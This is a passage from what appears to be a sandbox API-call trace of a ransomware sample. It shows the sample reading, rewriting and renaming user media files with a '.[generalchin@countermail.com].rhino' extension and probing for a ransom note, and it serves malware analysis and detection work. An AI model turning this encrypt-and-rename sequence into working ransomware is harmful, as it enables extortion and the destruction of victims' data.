lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x129e5, lpOverlapped=0x0) returned 1 [0081.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0081.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0081.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0081.421] GetLastError () returned 0x0 [0081.421] SetLastError (dwErrCode=0x0) [0081.421] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12a08) returned 0x744cd8 [0081.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0081.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0081.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.422] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0081.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0081.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0081.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0081.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0081.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.422] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0081.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0081.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0081.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0081.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0081.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0081.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0081.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0081.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0081.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0081.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0081.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0081.423] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0081.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0081.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0081.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x717898 [0081.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0081.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x718200 [0081.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717898 | out: hHeap=0x6d0000) returned 1 [0081.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6ee498 [0081.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718200 | out: hHeap=0x6d0000) returned 1 [0081.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x6ef9d8 [0081.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0081.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x7576e8 [0081.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef9d8 | out: hHeap=0x6d0000) returned 1 [0081.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x2230048 [0081.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7576e8 | out: hHeap=0x6d0000) returned 1 [0081.424] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x2234798 [0081.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0081.427] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x223b278 [0081.429] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2234798 | out: hHeap=0x6d0000) returned 1 [0081.429] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x7630c0 [0081.432] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x223b278 | out: hHeap=0x6d0000) returned 1 [0081.432] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x2230048 [0081.433] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7630c0 | out: hHeap=0x6d0000) returned 1 [0081.433] WriteFile (in: hFile=0x124, lpBuffer=0x2230060*, nNumberOfBytesToWrite=0x12b05, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x2230060*, lpNumberOfBytesWritten=0x4af2ac*=0x12b05, lpOverlapped=0x0) returned 1 [0081.433] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0081.433] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x12b05, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0081.433] CloseHandle (hObject=0x124) returned 1 [0081.622] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x6f36d0 [0081.623] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x703e78 [0081.623] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.623] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\X2JajLRX6.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\x2jajlrx6.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\X2JajLRX6.bmp.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\x2jajlrx6.bmp.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0081.623] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.623] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0081.624] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0081.624] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0081.624] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0081.624] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0081.624] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x6f36d0 [0081.624] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0081.624] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.625] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.625] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\Y3db1aC_5AlNpQZ4cPG.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\y3db1ac_5alnpqz4cpg.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.625] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x1076b [0081.625] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1088b, nNumberOfBytesToLockHigh=0x0) returned 1 [0081.625] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.625] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0081.627] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.627] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x1076b, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x1076b, lpOverlapped=0x0) returned 1 [0081.628] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0081.628] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.628] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0081.628] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0081.628] GetLastError () returned 0x0 [0081.628] SetLastError (dwErrCode=0x0) [0081.628] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.628] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1078e) returned 0x744cd8 [0081.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0081.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0081.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.629] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0081.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0081.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0081.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0081.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0081.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0081.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0081.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0081.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0081.630] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0081.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0081.630] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0081.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0081.630] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0081.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0081.630] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0081.630] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0081.630] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0081.630] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0081.630] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0081.630] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0081.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0081.631] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0081.631] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0081.631] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0081.631] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0081.631] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0081.631] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x717898 [0081.631] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0081.631] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x718200 [0081.631] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717898 | out: hHeap=0x6d0000) returned 1 [0081.631] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6ee498 [0081.632] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718200 | out: hHeap=0x6d0000) returned 1 [0081.632] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x6ef9d8 [0081.632] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0081.632] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x755470 [0081.632] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef9d8 | out: hHeap=0x6d0000) returned 1 [0081.632] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x2230048 [0081.632] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x755470 | out: hHeap=0x6d0000) returned 1 [0081.636] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x2234798 [0081.638] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0081.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x223b278 [0081.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2234798 | out: hHeap=0x6d0000) returned 1 [0081.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x7630c0 [0081.642] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x223b278 | out: hHeap=0x6d0000) returned 1 [0081.643] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x2230048 [0081.643] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7630c0 | out: hHeap=0x6d0000) returned 1 [0081.643] WriteFile (in: hFile=0x124, lpBuffer=0x2230060*, nNumberOfBytesToWrite=0x1088b, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x2230060*, lpNumberOfBytesWritten=0x4af2ac*=0x1088b, lpOverlapped=0x0) returned 1 [0081.643] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0081.643] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1088b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0081.644] CloseHandle (hObject=0x124) returned 1 [0081.645] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9730 [0081.645] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x7158b0 [0081.645] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9730 | out: hHeap=0x6d0000) returned 1 [0081.645] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\Y3db1aC_5AlNpQZ4cPG.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\y3db1ac_5alnpqz4cpg.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\Y3db1aC_5AlNpQZ4cPG.avi.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\y3db1ac_5alnpqz4cpg.avi.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0081.646] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7158b0 | out: hHeap=0x6d0000) returned 1 [0081.646] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0081.646] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0081.646] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0081.646] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0081.646] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0081.646] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x6f36d0 [0081.646] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0081.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.647] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0081.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tjRtep--W8 SqtmSnaj\\ZdpWNdpdNx.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tjrtep--w8 sqtmsnaj\\zdpwndpdnx.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.647] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x4cc3 [0081.647] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4de3, nNumberOfBytesToLockHigh=0x0) returned 1 [0081.647] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.647] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0081.649] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.649] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x4cc3, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x4cc3, lpOverlapped=0x0) returned 1 [0081.650] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0081.650] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.650] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0081.650] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0081.650] GetLastError () returned 0x0 [0081.650] SetLastError (dwErrCode=0x0) [0081.650] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0081.650] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4ce6) returned 0x744cd8 [0081.650] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0081.650] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0081.650] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0081.650] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0081.650] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.650] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0081.650] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0081.650] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0081.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0081.651] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0081.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0081.651] HeapFree (in: hHeap=0x6d0000, 